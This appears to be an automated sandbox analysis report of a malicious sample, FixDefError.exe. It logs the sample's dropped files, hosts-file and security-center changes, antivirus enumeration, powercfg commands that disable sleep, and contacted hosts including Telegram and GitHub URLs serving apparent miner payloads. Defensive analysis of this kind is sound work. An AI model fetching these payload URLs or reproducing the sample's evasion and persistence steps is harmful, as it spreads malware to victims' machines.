Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Queries volume information: C:\ProgramData\RuntimeBrokerData\RegSvc.exe VolumeInformation
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\RuntimeBrokerData\RegSvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\FixDefError.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies power options to not sleep / hibernate
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Modifies the hosts file
Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\SysWOW64\schtasks.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\SysWOW64\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\SysWOW64\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 00000047.00000002.516627565.0000029D68640000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ,@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000047.00000002.516940028.0000029D68702000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 829697 Sample: FixDefError.exe Startdate: 19/03/2023 Architecture: WINDOWS Score: 100 67 www.google.com 2->67 69 rentry.co 2->69 81 Snort IDS alert for network traffic 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 Antivirus detection for dropped file 2->85 87 8 other signatures 2->87 10 FixDefError.exe 5 2->10         started        13 RegSvc.exe 2->13         started        17 svchost.exe 2->17         started        19 7 other processes 2->19 signatures3 process4 dnsIp5 63 C:\Users\user\AppData\...\ProgramStarter.exe, PE32 10->63 dropped 65 C:\Users\user\AppData\...\FixDefError.exe.log, ASCII 10->65 dropped 21 ProgramStarter.exe 15 27 10->21         started        77 rentry.co 13->77 105 Machine Learning detection for dropped file 13->105 107 Changes security center settings (notifications, updates, antivirus, firewall) 17->107 79 192.168.2.1 unknown unknown 19->79 file6 signatures7 process8 dnsIp9 71 api4.ipify.org 104.237.62.211, 443, 49686 WEBNXUS United States 21->71 73 api.telegram.org 149.154.167.220, 443, 49687 TELEGRAMRU United Kingdom 21->73 75 5 other IPs or domains 21->75 55 C:\ProgramData\RuntimeBrokerData\svhost.exe, PE32+ 21->55 dropped 57 C:\ProgramData\...\WinRing0x64.sys, PE32+ 21->57 dropped 59 C:\ProgramData\...\RuntimeBroker.exe, PE32 21->59 dropped 61 2 other malicious files 21->61 dropped 89 Antivirus detection for dropped file 21->89 91 Multi AV Scanner detection for dropped file 21->91 93 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->93 95 4 other signatures 21->95 26 cmd.exe 1 21->26         started        29 cmd.exe 21->29         started        31 cmd.exe 1 21->31         started        33 14 other processes 21->33 file10 signatures11 process12 signatures13 97 Encrypted powershell cmdline option found 26->97 99 Uses schtasks.exe or at.exe to add and modify task schedules 26->99 101 Uses powercfg.exe to modify the power settings 26->101 35 powershell.exe 22 26->35         started        37 conhost.exe 26->37         started        103 Modifies power options to not sleep / hibernate 29->103 39 powercfg.exe 29->39         started        49 6 other processes 29->49 41 conhost.exe 31->41         started        43 schtasks.exe 1 31->43         started        45 conhost.exe 33->45         started        47 conhost.exe 33->47         started        51 26 other processes 33->51 process14 process15 53 Conhost.exe 39->53         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
142.251.209.36
 www.google.com United States
15169 GOOGLEUS false
104.237.62.211
 api4.ipify.org United States
18450 WEBNXUS false
198.251.88.130
 rentry.co United States
53667 PONYNETUS false
140.82.121.3
 github.com United States
36459 GITHUBUS false
185.199.111.133
 raw.githubusercontent.com Netherlands
54113 FASTLYUS false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
api4.ipify.org 104.237.62.211 true
github.com 140.82.121.3 true
rentry.co 198.251.88.130 true
raw.githubusercontent.com 185.199.111.133 true
www.google.com 142.251.209.36 true
api.telegram.org 149.154.167.220 true
api.ipify.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://github.com/ETHMonsterM/ETHMonsterM/raw/main/cpm.exe false
    		high
    https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe false
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown
    https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sys false
    • Avira URL Cloud: safe
    		 unknown
    https://rentry.co/ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw false
    • Avira URL Cloud: safe
    		 unknown
    https://api.ipify.org/ false
      		high